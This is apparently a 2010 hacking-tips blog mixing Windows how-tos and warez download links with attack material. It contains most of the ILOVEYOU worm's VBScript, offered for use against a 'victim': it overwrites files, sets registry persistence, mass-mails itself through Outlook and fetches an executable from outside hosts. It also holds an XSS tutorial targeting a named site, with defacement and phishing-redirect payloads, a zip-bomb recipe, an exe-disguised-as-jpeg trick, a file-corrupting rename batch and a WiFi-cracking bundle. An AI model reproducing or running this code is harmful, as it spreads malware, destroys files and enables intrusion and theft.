Wednesday, September 29, 2010

Reveal *****---Asterisk--- Passwords

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.


javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox.

The ZIP of Death

This is a exploit of the compression algorithms to make a small zip that will extract into extream amounts their are more ways and better ones than this one but i will only show how to make a simple 1k = 1m ratio.

1) Make a.txt file

2) Open and type the null character (alt + 255)

3) Press ctrl + a then ctrl + v a couple times to make some null bytes

4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

5) Now make several copies of a.txt and name accordinly

6) Open cmd.exe

7) Type copy /b *.txt b.txt

8) Now every copy is made into a super copy and repeat

9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!

The zip is only 1 mb in size and can really annoy freinds.
For added fun hex edit the zip and you will see a bunch of hex 5555

Just add some more and the file will expand amazingly

Make sure to not open this after

You can always create your zip of death from the command line in linux
dd if=/dev/zero bs=1000 count=1000000 | gzip > test.gz

Creating IM Bot

This quick tutorial will show you how to develop your own functional IM bot that works with Google Talk, Yahoo! Messenger, Windows Live and all other popular instant messaging clients.
To get started, all you need to know are some very basic programming skills (any language would do) and web space to host your “bot”.


If you like to write a personal IM bot, just follow these simple steps:-
Step 1: Go to www.imified.com and register a new account with a bot.
Step 2: Now it’s time to create a bot which is actually a simple script that resides on your public web server.
It could be in PHP, Perl, Python or any other language.
Example Hello World bot:
The example below illustrates just how easy it is to create a bot.
This example is coded in PHP.
<?php
switch ($_REQUEST['step']) {
case 1:
echo "Hi, what's your name?";
break;
case 2:
echo "Hi " . $_REQUEST['value1'] . ", where do you live?";
break;
case 3:
echo "Well, welcome to this hello world bot, " . $_REQUEST['value1'] . "<br>from " . $_REQUEST['value2'] . ".<reset>";
break;
}
?>
Step 3: Once your script is ready, put it somewhere on your web server and copy the full URL to the clipboard.
Step 4: Now login to your imified account, paste the script URL

Step 5: Add that im bot your friends list. That’s it.
This is a very basic bot but the possibilities are endless.

Uninstalling Windows from Command Prompt

One option included in Windows XP is the ability to uninstall XP if you performed an upgrade from Windows 98, 98SE, or Windows Me.

The standard method of removing XP is achieved by booting into XP normally and uses the Add/Remove Programs tool in Control Panel.

If you are unable to start XP normally, the second option is to load XP in Safe Mode then use the same tool.

If you are unable to boot normally or boot into Safe Mode, XP can be removed by uninstalling from a Command Prompt.

The procedure is as follows:

Important Note: This procedure is available only if a successful image of the previous operating system was created during the XP upgrade.

Start the computer to Safe Mode with Command Prompt.

At the command prompt, type cd\, and then press ENTER.

Type cd\windows\system32, and then press ENTER.

Type osuninst.exe, and then press ENTER.

On screen instructions will guide you through the uninstall process to revert to the previous operating system.

This procedure can only be performed by users logged on as Administrator or a user with administrative rights.

Tracing or Routing a website using command prompt

Tracing or Routing a website using command prompt. This tip is only meant for educational purpose. I mainly use this trick to find out the hosting provider where a particular domain is hosted.
Follow the below steps:
1.   Start->Run->CMD  ie; open Command prompt
2.  Type the following command and press enter.

tracert www.websitename.com

in the above command, enter the desired website name.
Once you press enter, it tell you where a particular domain is hosted, Location, Country and some details of that domain.
Disclaimer: I am not responsible for this trick if this is used in a wrong way. I didn’t invent this method rather I myself found it somewhere else. Do not use this for Hacking purpose.

Sunday, September 26, 2010

XSS Cross Site Scripting Attack

I though to demonstrate another type of website hacking attack called Cross Site Scripting attack,a.k.a. XSS. XSS vulnerabilities occur due to weak coding of the web applications. Once the hacker finds this vulnerability he/she injects malicious codes(Usually in web forms) to steal session cookies and later the hacker uses those cookies to gain access to sensitive page content.
Xss Cross Site Scripting may be classified in two types:
1.Persistent XSS
2.Non Persistent XSS
In order to demonstrate a XSS attack I will take an example of a website:
http://www.redwrappings.co.in/
Checking the venerability
The simplest way to check the vulnerability is to enter the following code in the any web form present on the website
<script>alert(“XSS”)</script>
xss cross site scripting
Once the attacker inserts the code A dialog box like the below one will appear:
Defacement
Now the attacker has found that the website is velnerable to an xss attack the attacker can do lots of damages to the website, The most common thing which the attacker will do is place his defacement image on that page showing that the website is hacked, For this purpose he will insert a code similar to the below one:
<html><body><IMG SRC=”http://site.com/yourDefaceIMAGE.png”></body></html>
Where http://site.com/yourDefaceIMAGE.png is the defacement image
Inserting Flash Videos
The attacker can also insert flash videos by entering the following code in any web form present on the website
Redirection
The attacker can also redirect the page to any particular page , In case if the hacker has managed to find XSS venerability in the a website like paypal.com or alertpay.com he can redirect that page to a Phisher Site(Fake login page) where the victim will loose his password, To redirect a an xssed page to another page the attacker will insert a code similar to the below one:
<script>window.open( “http://www.google.com/” )</script>
Stealing Cookies
Most of the attackers after finding a website venerable to xss will probably steal victims cookies to gain access to their account or private data this method is called Session hijacking, which is a detailed topic and I will be explaining in the later articles
Hope you have learned some XSS ,Feel free to ask if you have any problem regarding the above information

Saturday, September 25, 2010

How to Enable or Disable Hibernation in Windows 7

Enable Hibernation

Enabling or Disabling the “Hibernate” option in Windows 7 or Vista is not as simple as it used to be in Windows XP. For Windows 7 a different approach has to be followed to accomplish the same job. In this post you will find how to enable or disable the Hibernate option in Windows 7.
Hibernation is a power saving option which was designed primarily for laptops. Unlike “sleep mode” which puts the open documents and files into the memory, hibernation puts all the open files and documents on to the hard disk and shuts down the computer without drawing even a small amount of power. Thus hibernation becomes an excellent way to save power and resume Windows back to the state where it was left off. If you really want to use this feature on Windows 7 then you need to enable this option. This can be done as follows.
1. Open the Command Prompt with “Administrator rights”. To do so, type cmd in Start menu and then hit Ctrl+Shift+Enter.
2. Now type the following command in the command prompt and hit Enter.
powercfg /hibernate on
3. Type exit and hit Enter to close the Command Prompt. Now you should see the “Hibernate” option in the Start menu. If not then perform the following steps.
A. Type Power Options in the Start menu and hit Enter.
B. In the left pane, open the link labeled “Change when the computer sleeps” and then open the link “Change advanced power settings”.
Now a small window will pop-up as shown below:
C. Now expand the Sleep tree and turn off Allow Hybrid Sleep as shown in the above screenshot.
D. Now you should see the Hibernate option in the Start menu.

Sunday, September 19, 2010

Format After Your need necessary software 2010 134MB


Format After Your need necessary software 2010 134MB


01.yahoo
02.skype
03.java
04.gom player
05.vlc player
06.real player gold
07.Adobe reader
08.Orbit Down loader
09.Firefox
10.Flash Player
11.Netscape

LINK 


http://hotfile.com/dl/69788525/c20478a/you_needed.part1.rar.html
http://hotfile.com/dl/69793934/4f300fa/you_needed.part2.rar.html
http://hotfile.com/dl/69800625/eef8c75/you_needed.part3.rar.html

Tags: yahoo skype java easy ewcs mralshan

    Torrent Mirror: Format After Your need necessary software 2010 134MB


You are not registred ! Please register in site .

Mega Rescue Kit CD 2011


Mega Rescue Kit CD 2011
Mega Rescue Kit CD 2011 | 607 MB

New Rescue CD for year 2011 "Mega Rescue Kit CD" Meets your needs in PC maintenance tasks by alot of special tools enables you improve your computer performance or recover the corrupted windows, remove the viruses, recover the lost data and more tasks.

Features
- Diagnosis and fix startup problems
- Lan Drivers, Network and USB
- SATA Drivers
- Recover the deleted or lost data
- Include anti-virus and anti-spyware tools (Live Update Available)
- Windows7 Live BartPE for easy accessing to your data
- Possibility of Internet connection
- Recover the passwords for admin account or other users
- Win7 Recovery Tools for Windows7 maintenance
- Restore and management the backup and system Images
- Measure temp of CPU and the system
- Remote Assistance Tools
- Get info for all system devices

Tools
- Windows 7 Live BartPE
- Diagnostics and Recovery Toolset
- System Image Recovery
- Startup Repair
- Kaspersky AntiVirus 2010
- DrWeb 2010
- Malwarebytes Anti-Malware
- SUPER AntiSpyWare
- Computer Managment
- Files and Folders Explorer
- Solution Wizard
- TCP/IP Config
- Hotfix Uninstall
- PDF Reader
- NotePad
- MSN Messenger
- Disk Wipe
- System Restore
- Windows Memory Diagnosis
- Command Prompt
- ERD Registry Editor
- Locksmith
- Crash Analyzer
- InfraRecorder
- FSViewer
- Everest
- Recover4all
- File Restore
- Disk Commander
- Standalone Syatem Sweeper
- Core Temp
- 7-Zip File Manager
- TeamViewer
- Drivers Installer

Download (Hotfile)
http://hotfile.com/dl/70125844/982237c/MRKC11.part1.rar.html
http://hotfile.com/dl/70125880/957a245/MRKC11.part2.rar.html
http://hotfile.com/dl/70125940/63f7d9a/MRKC11.part3.rar.html
http://hotfile.com/dl/70125976/531e103/MRKC11.part4.rar.html
http://hotfile.com/dl/70126021/4df5792/MRKC11.part5.rar.html
http://hotfile.com/dl/70126053/1b984c9/MRKC11.part6.rar.html

Mirror (Easy-Share)
http://www.easy-share.com/1912311860/MRKC11.part1.rar
http://www.easy-share.com/1912311840/MRKC11.part2.rar
http://www.easy-share.com/1912311841/MRKC11.part3.rar
http://www.easy-share.com/1912311861/MRKC11.part4.rar
http://www.easy-share.com/1912311842/MRKC11.part5.rar
http://www.easy-share.com/1912311843/MRKC11.part6.rar

Mirror (Uploading)
http://uploading.com/files/9f6a1d6a/MRKC11.part1.rar/
http://uploading.com/files/m48cb81m/MRKC11.part2.rar/
http://uploading.com/files/ac2f6ad9/MRKC11.part3.rar/
http://uploading.com/files/f91b3847/MRKC11.part4.rar/
http://uploading.com/files/45534be7/MRKC11.part5.rar/
http://uploading.com/files/e977fmc7/MRKC11.part6.rar/

WiFi Hack The Ultimate Collection - AIO | 82.2Mb


WiFi Hack The Ultimate Collection - AIO | 82.2Mb

WiFi Hack The Ultimate Collection - AIO


Hacks page 1:
- Comm View for WiFi v5.2484
- Pure NetWorks Network Magic 2
- Air Hack
- AP Sniff
- Comm View
- Aerosol
- Easy WiFi Radar
- Boingo Wireless

Hacks page 2:
- Get Wep Key Of Encrypted Wireless Connection
- WiFi Companion v2.10.4
- Net Stumbler
- WiFi Hack Tools
- WiFi Internet Access Blocker
- iPig WiFi HotSpot VPN Security

Hacks page 3:
- Hot Spotter v0.4
- Kismet
- WDG
- AirShort v0.2.7e
- WiFi Hopper v1.2
- Wireless NetWork Ignition
- Wepwedgie - alpha
- Wep Hack

e-Books:
- O-Reilly Wireless Hacks
- System Hacking 2k
- FBI Teaches how to break WiFi
- Collection of Hacking Dictionary
- How to Hack WEP

Download: 82.2Mb 
http://hotfile.com/dl/70248971/f329708/WiFi_Hack__AIO_Ultimate_2010.rar.html

Dylan Cole Wallpaper


Dylan Cole Wallpaper
Dylan Cole Wallpaper 
134 Pics | JPG | From 604x460 to 1024x873 | 11 MB

Tuesday, September 14, 2010

i love you " virus "

it's programmed this code i update some futures ,simple script u can upload it on your site by inject in
your site and give to your victim as link "http:\\yoursite.com " and it will copy it self in his machine or
Attached but in Microsoft Outlook


This code didn't need Microsoft Visual Studio copy this code to u notepad and but extension ".vbs"

Check attached txt code and changes it to extension to "vbs" instated of "txt" and u can convert the code to
visual basic 6.0 if u like vb just tell me

'***************************************
rem by: chakshu00grg@gmail.com hackosys
On Error Resume Next
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,dow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting
Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSKernel32
",dirsystem&"\MSKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices\Wi
n32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Microsoft\Internet
Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX
.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFI
X",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start
Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct")
or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&"\script.ini")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{"
scriptini.WriteLine "n1= /if ( $nick == $me ) { halt }"
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}"
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
sub spreadtoemail()
On Error Resume Next
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad
set regedit=CreateObject("WScript.Shell")
set out=WScript.CreateObject("Outlook.Application")
set mapi=out.GetNameSpace("MAPI")
for ctrlists=1 to mapi.AddressLists.Count
set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a)
if (regv="") then
regv=1
end if
if (int(a.AddressEntries.Count)>int(regv)) then
for ctrentries=1 to a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead)
if (regad="") then
set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me."
male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&malead,1,"REG_DWORD"
end if
x=x+1
next
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
else
regedit.RegWrite
"HKEY_CURRENT_USER\Software\Microsoft\WAB\"&a,a.AddressEntries.Count
end if
next
Set out=Nothing
Set mapi=Nothing
end sub
sub html
On Error Resume Next
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="
'*******************************************************
'End

Fake virus detected(HARMLESS)

First we have to open notepad again
1.type this in or copy.
@echo off
echo WARNING VIRUS DETECTED
echo System check
echo -
echo Hard drive - FAILED
echo -
echo RAM - FAILED
echo -
echo Disk Drive - FAILED
echo -
echo Connection - FAILED
echo -
echo code 754*sd56625
echo -
echo Hard drive must be formatted to resume windows
echo -
PAUSE
echo -
echo -WARNING
echo -
echo Hard drive has been formatted
echo -
echo -WARNING
echo -

PAUSE
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
echo APRIL FOOLS
pause


2.Save as a.bat
3.convert the a.bat to an exe file which lets you name it and change the icon.
4.to convert it you will need to goto www.f2ko.de and download bat_to_exe
5. put it on some ones computer and watch them freak out

RESULTS
Look at the screen shot below and this is what the person will see. where it says pause you have to press a key to see the writing below it.

Monday, September 13, 2010

Types of virus

Virus are classifed mainly on based on what they affect & how, size.


Based on what they effect.

1.Computer virus.
2.Mobile virus -Nowerdays many virus are written for mobile They spread through gprs/bluetooth.
3.Music player virus -There exsists only a handful of such virus.Theu spread when you add a song /video or dwnload some thing

Based on size

•Tiny virii - These are under 500 bytes. They are designed to be undetectable due to their small size. TINY is one such virus. They generally very simple because their code length is so limited.
•Large Virus- They are over 1,500 bytes. They are designed to be undetectable because they cover their tracks very well (all that code DOES have a use!). The best example of this is the Whale virus, which is perhaps the best 'stealth' virus in existence. •Other virus- These virus are easily detectable. Many virus are of this type.

Based on How they effect

All these many seam like compurt virus only but that is only partly true as your mobile too has an OS.

•Boot Sector Virus: This virus replaces or implants itself in the boot sector---an area of the hard drive (or any other disk) accessed when you first turn on your computer. This kind of virus can prevent you from being able to boot your hard disk.
•File Virus: This infects your applications. These then spread the virus by infecting other applications. You need to run or open these files.
•Macro Virus: These account for about 75 percent of viruses found in the wild. They are written using a simplified macro programming language, these viruses affect Microsoft Office applications, such as Word and Excel, and . A document infected with a macro virus generally modifies a pre-existing, commonly used command (such as Save) to trigger its payload upon execution of that command.
•Multipartite Virus: These infects both files and the boot sectorthat infect your system dozens of times before it's caught.
•Polymorphic Virus: A well written virus of this type is usually difficult for antivirus scanners to detect but these are usually not that well written. They changes code whenever it passes to another machine.
•Stealth Virus: These hides its presence by making an infected file not appear infected, but doesn't usually stand up to antivirus software.

<!--199a7bf0ff1b425f8670f4f00421746b-->
<!--03909001b799489bbd4f7e6dde8301aa-->

Convert Exe to JPEG

Converting EXE to some other format say JPEG is easier than you think. This will not physically convert the exe file to jpeg. All that this does is this will trick someone including your OS to some extend in thinking that it's a jpeg file and thus opening/running the exe file. Ok i will use firefox.exe to show how you do it.


Create a new folder and copy the firefox.exe file into it. Now just create a shortcut of the file in the same folder. This shortcut is going to be the image(jpeg). Rename the shortcut to say, viruswriting.jpeg and original so vir.jpeg

remember these 2 files (original and shortcut) have to be in the same folder

Now right click on the shortcut and delete the "Start in" field. Change th e target field to C:\WINDOWS\system32\cmd.exe /c vir.jpeg.


Now you need to change the icon of the shortcut file and the job is done. This trick is mainly for those who run their own server.This way when ever the person opens the shortcut the exe file will execute .


Note that both files have to be in the same folder and the user has to click on the shortcut and not on the original file. So if you are sending this to someone place both in the same folder and compress it . Now send the .zip or .rar file

Change Files extentions of all files at once

In order to corrupt files all that we do is change files to non-working TXT files or some other format.


REN *.EXE *.TXT

REN *.COM *.TXT

REN *.BAT *.TXT

REN *.LNK *.TXT



Just copy the above code into a Notepad file and save it .BAT This is not it You can even change files to any other extension like


*.JPEG *.DOC

*.COM means all files with extension .COM. Ren is a dos command to rename. The above cde just renames all . .COM files to .TXT.

Themes S60 for mobiles Nokia



Sis | 20 | 360х640 | 60.8mb

DOWNLOAD

Games for phones s60v3 symbian 9.x (Pack 1)


jar, sis | 55 | 176х220 | 240x860 | 84.64 MB


3D Contr Terrorism
3D Moto Racing Evolved
3D Solid Weapon 2
3D Guns Wheels
3D Artefact of Glory
3D Asphalt Urban GT 3 Streets Rules
3D Asphalt 4: Elite Racing
3D Asphalt Urban GT 2
3D Brother In Arms Earned in Blood
3D Fast And Furious The Movie
3D Оps Sniper
3D The Overtaker
Age of Heroes VI
FarCry 2
Call of duty Modern Warfare 2
Aliens vs Predator - Requiem
Anrufen - onlain
Biochemical raid
Biozone
Call Of Duty V World At war
Chuck Norris Bring on the Pain
Comm and Conquer Red Alert
Commandos
Defend London
Devils And Demons
Disciples
Driver LA Undercover
Edge of Fire
Fallout mobile
GTA 4
Heroes of wars and storm
Kgb swat
Land of kings
Last Limit
Medal Of Honor Airborne
Metal Slug 4
Metal Gear Acid 2
Might and Magic II
Need for Speed™ Undercover
Postal
Predator - the duel
Rise of cobra
Sniper Shot
Terminator Salvation
The Sims 3
The Egyptians
Tomb Raider Underworld
Top Gear
Tower Defense
Transformers: Revenge of the Fallen
Turok
UFO Afterlight
Watchmen
Wizards by RGT
Wolfenstein

DOWNLOAD

Wonderful theme for Nokia S40 Pack 8


nth | 22 | 240x320 | 20 Mb


DOWNLOAD

Ringtones for mobile - Music Box (2010)


2010 | mp3 | 128 Kbps | 22 Mb


1. Tiesto - Speed rail.mp3
2. Armin van Buuren - Mirage.mp3
3. Dj Kadr - Boom.mp3
4. The Pretty Reckless - Far from never.mp3
5. Alesha - Drummer boy (Yolanda Be Cool and DCup Remix).mp3
6. DJ Solovey - Sex and music.mp3
7. Armin van Buuren feat. Winter Kills - Take a moment.mp3
8. Princessa Avenue - That girl.mp3
9. DJ Bullet feat. Yana and Karina - Раз Два Три (Club mix).mp3
10. Stromae - House Lleluja (Klaas Mix).mp3
11. Shakira - Loca (Spanish version).mp3
12. Don Omar feat. Lucenzo - Danza kuduro.mp3
13. Stay and Play - Fuck the club (Club Mix).mp3
14. T.Y. feat. Dino MC 47 - Нереально с ней.mp3
15. Алсу - Я тебя не придумала.mp3
16. Ciara - Why you.mp3
17. R. Kelly - Fireworks.mp3
18. Inna feat. Juan Magan - Un momento (Radio Edit).mp3
19. Maybe - Скучаю.mp3
20. Elton John and Leon Russell - If it wasn't for bad.mp3
21. Madonna - Animal.mp3
22. Шахзода - Четыре шага (Radio Edit Radu Sirbu Remix).mp3
23. Shakira - Loca (English version).mp3
24. Enrique Iglesias - Ring my bells.mp3
25. Сергей Лазарев - Feelin' high.mp3
26. Fast Foot - Back again.mp3
27. Ne-Yo - Amazing you.mp3
28. Максим - Мой ответ Да (Dance version).mp3
29. Fast Foot - Electro masters.mp3
30. Александр Рыбак - Так и скажи.mp3
31. Armin van Buuren feat. Nadia Ali - Feels so good.mp3
32. Yves Larock ft. Trisha - Until tomorrow (The Good Guys remix).mp3
33. Jason Reeves - Helium hearts.mp3
34. Armin van Buuren feat. Christian Burns - This light between us.mp3
35. Тимур Родригез - О тебе.mp3
36. Armin van Buuren feat. Winter Kills - Take a moment.mp3
37. Kylie Minogue - Change your mind.mp3
38. Mike Candys - Together again (Club Mix).mp3
39. Tiesto feat Jinks - Pssst.mp3
40. Pitbull ft Young Gee and Trina - Okay.mp3


DOWNLOAD

Themes for Nokia S40


nth | 25 | 240х320 | 101 Mb

DOWNLOAD

Mobile wallpaper



JPG | 270 | 240х320 | 10.63 Mb

DOWNLOAD

Fruit Ninja [1.3] [2010/iPhone/iPod Touch]


English | Not less than 2.2.1 | 10.6 MB
DOWNLOAD

1000000% working solution of KG200/KG300 Handsfree Mode


Here is the solution of KG 300 with Handsfree Mode...when ur Tracks of Handsfree Jack are missing...

Tested on many phones..

1202 power solution [Mobile Rdx]

Iphone 3g no mic solution

I-phone 2G Charging

I-phone 3GS Home Button Ways

I-Phone 2G Power Button Way

I-phone 3G Charging

Power ic iphone 3g

i phone 3g white screen

Iphone 3G LCD faint image display

Sunday, September 12, 2010

All Blackberry Repair Software


All Blackberry Repair Software
password : nexthermanblackberry

All Blackberry Repair Software.rar (7,574 KB)

Download file now

All Blackberry Software Solution In one (By Kenny ic3)






Software Tools
=====================
* Unlock
* Desktop manager
* Jl Loader
* Sim unlock Tool
* USB and modem drive
* JL Commander
* Themes Creator V4.6 and 4.7
* APPS Blackberry
* Radio Lab Tool
* Video Unlock
* Video Disassembely Blackberry all type

Tips And Trick Blackberry
=====================
* Blackberry Unlock Codes and instructions
* Blackberry Error Code & Solution

* Blackberry Email repairing
* How unlock Blackberry series 7,8,9
* Dead Blackberry Recover Tips
* Installing Blackberry Handheld Software
* Tips update Blackberry Curve 8350i

Firmware

ALL Type Blackberry
DOWNLOAD

BlackBerry Firmware Files



BlackBerry Firmware Files

Check link Here........

http://members.a1.net/updateservice/bb/

Jaf 1.98.66 Cracked / Virtual Pkey v5



Jaf 1.98.66 Cracked / Virtual Pkey v5

All CDMA Codes


DOWNLOAD

NOKIA 5030c Solution Pack


NOKIA 5030c Solution Pack

DOWNLOAD

Nokia All Application Collection


Nokia All Application Collection



DOWNLOAD

FIMRWARE BLACKBERRY All in ONE EXE



DOWNLOAD
Part 1


Part 2

N900 MMC SOLUTION

N900 GPS NOT WORKING SOLUTION

nokia n900 on/off soltuion